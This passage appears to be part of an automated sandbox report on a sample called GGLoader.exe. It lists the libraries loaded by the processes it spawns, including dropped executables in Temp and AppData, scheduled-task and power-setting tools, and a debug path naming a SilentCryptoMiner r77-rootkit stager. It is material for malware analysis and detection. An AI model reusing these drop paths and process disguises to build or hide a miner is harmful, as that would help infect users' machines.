                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\Desktop\GGLoader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: GGLoader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: GGLoader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbQZmW source: powershell.exe, 00000001.00000002.1955811622.000001EC48C05000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: H:\CRYPTOCOIN\Mining\Miner\SilentCryptoMiner\r77-rootkit-master\Stager\obj\x64\Release\Stager.pdb source: LicSend.exe, 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ore.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbD source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1965111928.000001EC48EB5000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000026.00000002.2213441971.0000000002851000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: tem.Core.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: t.Automation.pdb_ source: powershell.exe, 00000001.00000002.1951237178.000001EC48B7C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb23~W4 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb:3FW3 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Core.pdb source: powershell.exe, 00000028.00000002.2583801472.000001C536CC8000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Binary or sample is protected by dotNetProtector
                        Source: GGLoader.exe, 00000000.00000000.1702342271.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: dotNetProtector
                        Source: GGLoader.exe, 00000000.00000000.1702342271.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: 